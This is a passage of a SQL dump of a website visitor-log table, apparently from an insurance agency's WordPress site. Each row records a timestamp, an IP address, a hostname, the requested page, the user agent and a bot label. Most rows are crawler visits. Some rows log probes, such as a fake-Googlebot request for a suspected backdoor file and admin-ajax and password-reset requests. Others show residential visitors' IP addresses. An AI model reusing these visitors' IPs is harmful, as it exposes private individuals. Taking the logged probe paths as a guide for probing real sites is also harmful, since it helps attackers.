+http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(3878,'0b_6d1af41a0eeb8d1cbecbe6b8f8195e85','1457768294','52.33.46.244','ec2-52-33-46-244.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3881,'0b_6d1af41a0eeb8d1cbecbe6b8f8195e85','1457768322','52.33.46.244','ec2-52-33-46-244.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3882,'0b_6d1af41a0eeb8d1cbecbe6b8f8195e85','1457768394','52.33.46.244','ec2-52-33-46-244.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3884,'0b_6d1af41a0eeb8d1cbecbe6b8f8195e85','1457768395','52.33.46.244','ec2-52-33-46-244.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3885,'0b_374c1284e869659a655b6c884915b24d','1457771893','66.249.75.103','crawl-66-249-75-103.googlebot.com','/products.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3887,'0b_8a2df49e715e91a539213e0c4c425c44','1457775299','23.95.199.144','23-95-199-144-host.colocrossing.com','/','Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0','http://www.empireins.com/','',0,'WinVista','Firefox 34','us','','','','','','','0','0',0),(3890,'0b_79dbe1f7e2e0410c0c575e308f1a1936','1457776144','45.55.229.153','45.55.229.153','/','Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0','','',0,'Win7 x64','Firefox 21','','','','','','','','0','0',0),(3893,'0b_07d0b4553c3be64d4e7568bf64c10f99','1457776165','45.55.229.153','45.55.229.153','/robots.txt','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36','','',0,'Win7','Chrome 34','','','','Unknown Spider','','','','0','0',0),(3896,'0b_121f593c6d430227afb49c486090671a','1457776177','45.55.229.153','45.55.229.153','/agent-tools/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.empireins.com','',0,'MacOSX','Firefox 29','','','','','','','','0','0',0),(3897,'0b_3adb63a0e67444579bdecda6ce8467c9','1457776178','45.55.229.153','45.55.229.153','/contact/','Mozilla/5.0 (Windows NT 6.1; rv:28.0) Gecko/20100101 Firefox/28.0','http://www.empireins.com','',0,'Win7','Firefox 28','','','','','','','','0','0',0),(3899,'0b_121f593c6d430227afb49c486090671a','1457776187','45.55.229.153','45.55.229.153','/carriers/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.9; rv:29.0) Gecko/20100101 Firefox/29.0','http://www.empireins.com','',0,'MacOSX','Firefox 29','','','','','','','','0','0',0),(3900,'0b_92fa52cc53ff30422c42cfc2080d2850','1457776187','45.55.229.153','45.55.229.153','/licensing-contracting/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.131 Safari/537.36','http://www.empireins.com','',0,'Win7','Chrome 34','','','','','','','','0','0',0),(3902,'0b_f34788258313097526ed9f09a42f5e14','1457777172','180.76.15.140','baiduspider-180-76-15-140.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(3905,'0b_f34788258313097526ed9f09a42f5e14','1457777450','180.76.15.155','baiduspider-180-76-15-155.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(3908,'0b_5cf27542a6eb8a410646f6c6bc64b31d','1457777451','180.76.15.19','baiduspider-180-76-15-19.crawl.baidu.com','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','us','','','Baiduspider','','','','0','0',0),(3909,'0b_9b8b7d2f2e351146553efa5bb33349d7','1457777599','123.125.71.36','baiduspider-123-125-71-36.crawl.baidu.com','/robots.txt','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(3912,'0b_a3ec3d2140e204e814c64dae034fa4ab','1457777667','71.189.164.218','static-71-189-164-218.lsanca.fios.verizon.net','/','Mozilla/5.0 (compatible; GimmeUSAbot/1.0; +https://gimmeusa.com/crawler.html)','','',0,'','','us','','','GimmeUSAbot','','','','0','0',0),(3914,'0b_0475c68e68d0b56d027fce3699277e13','1457777718','52.37.138.106','ec2-52-37-138-106.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3915,'0b_0475c68e68d0b56d027fce3699277e13','1457777742','52.37.138.106','ec2-52-37-138-106.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3917,'0b_0475c68e68d0b56d027fce3699277e13','1457777791','52.37.138.106','ec2-52-37-138-106.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3918,'0b_0475c68e68d0b56d027fce3699277e13','1457777793','52.37.138.106','ec2-52-37-138-106.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3921,'0b_44dce0c5fdd7e2232743abacaa91a04e','1457778024','52.33.227.96','ec2-52-33-227-96.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (Windows; U; WindowsNT 5.1; en-US; rv1.8.1.6) Gecko/20070725 Firefox/2.0.0.6','http://www.google.com','',0,'Windows','Firefox 2','us','','','','','','','0','0',0),(3924,'0b_79e82a323d7766b28900a9b04854f5a8','1457779232','204.79.180.144','204.79.180.144','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','','',0,'Win7','IE 9','us','','','','','','','0','0',0),(3926,'0b_79e82a323d7766b28900a9b04854f5a8','1457779261','204.79.180.146','204.79.180.146','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0; Trident/5.0)','http://www.empireins.com/','',0,'Win7','IE 9','us','','','','','','','0','0',0),(3929,'0b_797da167f4de82f31dfa5f46f1ed249a','1457782287','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3930,'0b_2bc7c57cf163aab052b4ca324e41ff21','1457783366','66.249.75.96','crawl-66-249-75-96.googlebot.com','/carriers/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3933,'0b_808867fe41cf9ddb8891ecfdfeb2e498','1457783417','66.249.73.189','crawl-66-249-73-189.googlebot.com','/products.html','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3936,'0b_5b744a4ee4d272ffcc6829d90cb91cb0','1457785495','66.249.73.194','crawl-66-249-73-194.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3938,'0b_7ef64f8704f22cf68787e65f5d948602','1457787973','54.183.252.218','ec2-54-183-252-218.us-west-1.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3941,'0b_7ef64f8704f22cf68787e65f5d948602','1457787992','54.183.252.218','ec2-54-183-252-218.us-west-1.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3942,'0b_7ef64f8704f22cf68787e65f5d948602','1457788052','54.183.252.218','ec2-54-183-252-218.us-west-1.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3944,'0b_7ef64f8704f22cf68787e65f5d948602','1457788053','54.183.252.218','ec2-54-183-252-218.us-west-1.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3945,'0b_2bd0212528f17fc6c0f6e02a836f177f','1457790328','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3947,'0b_2bd0212528f17fc6c0f6e02a836f177f','1457790337','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3948,'0b_2bd0212528f17fc6c0f6e02a836f177f','1457790340','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/SSO/235_42.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3951,'0b_a78ff62af103b0731c43e8075d4893ad','1457790376','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(3953,'0b_8f4f22cd5db2d91e8f2ccbd6618c2ec6','1457791660','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3956,'0b_812fa5cb0a9017d69fab159fa0ff4f89','1457796573','52.37.103.220','ec2-52-37-103-220.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3959,'0b_812fa5cb0a9017d69fab159fa0ff4f89','1457796573','52.37.103.220','ec2-52-37-103-220.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3962,'0b_812fa5cb0a9017d69fab159fa0ff4f89','1457796581','52.37.103.220','ec2-52-37-103-220.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3963,'0b_7bb4d3ff3a7dbb954029fb2cf274da2e','1457796641','52.37.103.220','ec2-52-37-103-220.us-west-2.compute.amazonaws.com','/about-us/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3965,'0b_7bb4d3ff3a7dbb954029fb2cf274da2e','1457796642','52.37.103.220','ec2-52-37-103-220.us-west-2.compute.amazonaws.com','/contact/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3966,'0b_c027b3a3aa40b3e0d282ecefb35dc9fc','1457796675','176.31.39.23','176.31.39.23','/igo/','Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7','IE 11','','','','','','','','0','0',0),(3968,'0b_59e096a6ee7042991e6462dea30368c8','1457797030','66.249.73.169','crawl-66-249-73-169.googlebot.com','/term-quotes/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(3969,'0b_ff6604aecdd5aff67e0b7889f2cb8e22','1457797131','52.34.120.160','ec2-52-34-120-160.us-west-2.compute.amazonaws.com','/robots.txt','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','Unknown Spider','','','','0','0',0),(3971,'0b_ff6604aecdd5aff67e0b7889f2cb8e22','1457797140','52.34.120.160','ec2-52-34-120-160.us-west-2.compute.amazonaws.com','/','Mozilla/5.0 (compatible; DomainAppender /1.0; +http://www.profound.net/domainappender)','','',0,'','','','','','','','','','0','0',0),(3974,'0b_5d83e12363b8b4856f698d096551a83c','1457797303','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(3977,'0b_73b3f52f15ac4b23652d69941d84c929','1457798848','184.154.139.23','placeholder.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3980,'0b_73b3f52f15ac4b23652d69941d84c929','1457798850','184.154.139.23','placeholder.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3981,'0b_73b3f52f15ac4b23652d69941d84c929','1457798853','184.154.139.23','placeholder.sitelock.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3984,'0b_73b3f52f15ac4b23652d69941d84c929','1457798855','184.154.139.23','placeholder.sitelock.com','/case-status/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3987,'0b_73b3f52f15ac4b23652d69941d84c929','1457798858','184.154.139.23','placeholder.sitelock.com','/about-us/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3990,'0b_73b3f52f15ac4b23652d69941d84c929','1457798861','184.154.139.23','placeholder.sitelock.com','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3992,'0b_73b3f52f15ac4b23652d69941d84c929','1457798862','184.154.139.23','placeholder.sitelock.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3995,'0b_fd1e553e154001766f097c0c1f5a4228','1457798864','184.154.139.23','placeholder.sitelock.com','/?p=303','SiteLockSpider [en] (WinNT; I ;Nav)','','',0,'WinNT','','','','','SiteLockSpider','','','','0','0',0),(3998,'0b_73b3f52f15ac4b23652d69941d84c929','1457798865','184.154.139.23','placeholder.sitelock.com','/about-us/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(3999,'0b_73b3f52f15ac4b23652d69941d84c929','1457798866','184.154.139.23','placeholder.sitelock.com','/insentives/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(4002,'0b_bfc3c1d16b94d09bb75021b03ad84c6f','1457800517','40.77.167.10','msnbot-40-77-167-10.search.msn.com','/igo','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4004,'0b_bfc3c1d16b94d09bb75021b03ad84c6f','1457800518','40.77.167.10','msnbot-40-77-167-10.search.msn.com','/igo/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(4007,'0b_aa7ad7ead704593b6e7f8b4db341b9bc','1457801096','108.176.128.52','cpe-108-176-128-52.nyc.res.rr.com','/','Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G870A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(4008,'0b_aa7ad7ead704593b6e7f8b4db341b9bc','1457801099','108.176.128.52','cpe-108-176-128-52.nyc.res.rr.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Linux; Android 5.0; SAMSUNG-SM-G870A Build/LRX21T) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.91 Mobile Safari/537.36','http://www.empireins.com/','',0,'Android 5','Chrome 49 Mobile','us','','','','','','','0','0',0),(4010,'0b_5f5b33c86d20eab26ecf751d71f74ca7','1457803219','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4011,'0b_6769da140d76007aba4fab124bf00f2d','1457804082','40.77.167.90','msnbot-40-77-167-90.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4013,'0b_d5b9364bf307d945da411d3480901887','1457804342','66.249.73.178','crawl-66-249-73-178.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4014,'0b_a7e2dcab886d3ea9fe475e242f85a4d7','1457807740','112.111.165.173','112.111.165.173','/wp-admin/admin-ajax.php','Mozilla/5.0 (Windows; Windows NT 5.1; en-US) Firefox/3.5.0','http://www.empireins.com/wp-admin/admin-ajax.php','',0,'WinXP','Firefox 3','us','','','','','','','3','0',0),(4017,'0b_49abbc390f0b5e20e9cf70da9ac2e7c1','1457807985','112.111.165.173','112.111.165.173','/wp-links.php.suspected_','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','http://www.googlebot.com/bot.html','',0,'','','','','','Spoofer bot','','','','0','0',0),(4020,'0b_c7fcb0b3f46740037ce8611ec36883ea','1457808248','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4022,'0b_c7fcb0b3f46740037ce8611ec36883ea','1457808249','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4023,'0b_c7fcb0b3f46740037ce8611ec36883ea','1457808250','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4026,'0b_8054de84b3405a5de2482a5a74cd38ec','1457809106','208.115.111.66','208-115-111-66-reverse.wowrack.com','/forms/','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4028,'0b_e9488d61a0b2fb601ce4ceff9912bb48','1457811413','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4029,'0b_e9488d61a0b2fb601ce4ceff9912bb48','1457811414','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/carriers/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4032,'0b_e9488d61a0b2fb601ce4ceff9912bb48','1457811415','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/case-status/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4035,'0b_e9488d61a0b2fb601ce4ceff9912bb48','1457811417','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4037,'0b_e9488d61a0b2fb601ce4ceff9912bb48','1457811418','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/licensing-contracting/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4040,'0b_e9488d61a0b2fb601ce4ceff9912bb48','1457811419','157.55.39.170','msnbot-157-55-39-170.search.msn.com','/contact/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4041,'0b_24a07fc7d16d1f52d873f99cd8c33c58','1457813748','66.249.73.169','crawl-66-249-73-169.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(4044,'0b_9b5be4858640a0d0efa00004fb4d8015','1457813944','52.86.213.172','ec2-52-86-213-172.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4047,'0b_9b5be4858640a0d0efa00004fb4d8015','1457813945','52.86.213.172','ec2-52-86-213-172.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4049,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814069','144.76.12.75','mj7.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4052,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814071','144.76.12.75','mj7.naefmarco.ch','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4055,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814072','144.76.12.75','mj7.naefmarco.ch','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4058,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814074','144.76.12.75','mj7.naefmarco.ch','/top.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4061,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814077','144.76.12.75','mj7.naefmarco.ch','/?a=pwdreset','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4062,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814079','144.76.12.75','mj7.naefmarco.ch','/illustration.htm','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4065,'0b_1fb335c3b609ceff1caaeffdc92a862b','1457814081','144.76.12.75','mj7.naefmarco.ch','/products.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','ch','','','MJ12bot','','','','0','0',0),(4067,'0b_ec789dedb58301fedef183dde6859f5e','1457815832','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4068,'0b_ec789dedb58301fedef183dde6859f5e','1457815833','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4071,'0b_ec789dedb58301fedef183dde6859f5e','1457815834','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4073,'0b_ec789dedb58301fedef183dde6859f5e','1457815835','52.73.242.77','ec2-52-73-242-77.compute-1.amazonaws.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(4074,'0b_ca02dc7fcd5cd0a9780e6770f065dc39','1457816636','54.91.16.247','ec2-54-91-16-247.compute-1.amazonaws.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_4) AppleWebKit/537.11 (KHTML, like Gecko)(compatible; http://url-validation.citygrid.com/) Chrome/23.0.1271.95 Safari/537.11','','',0,'MacOSX','Google Chrome','','','','Unknown Spider','','','','0','0',0),(4077,'0b_2aca9df1f8d6b434d92a768d2c23a547','1457817266','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4080,'0b_aae51c6f12cc1edbeee1887f674d5bf7','1457820400','66.249.73.187','crawl-66-249-73-187.googlebot.com','/quotes.htm','Mozilla/5.0 (iPhone; CPU iPhone OS 8_3 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12F70 Safari/600.1.4 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'iPhone OS','','','','','Googlebot-Mobile','','','','0','0',0),(4082,'0b_2ba0b8ef5f9a048247d5945355b7068a','1457821881','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4085,'0b_2ba0b8ef5f9a048247d5945355b7068a','1457821882','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4086,'0b_2ba0b8ef5f9a048247d5945355b7068a','1457821883','207.46.13.177','msnbot-207-46-13-177.search.msn.com','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(4088,'0b_0d954e80e130a1cefcbce2f334e5d98b','1457822438','208.115.113.83','208.115.113.83','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; http://www.opensiteexplorer.org/dotbot, help@moz.com)','','',0,'','','','','','dotbot','','','','0','0',0),(4091,'0b_16359d5a465c333b093e007e95f405b9','1457824267','208.115.111.66','208-115-111-66-reverse.wowrack.com','/robots.txt','Mozilla/5.0 (compatible; DotBot/1.1; 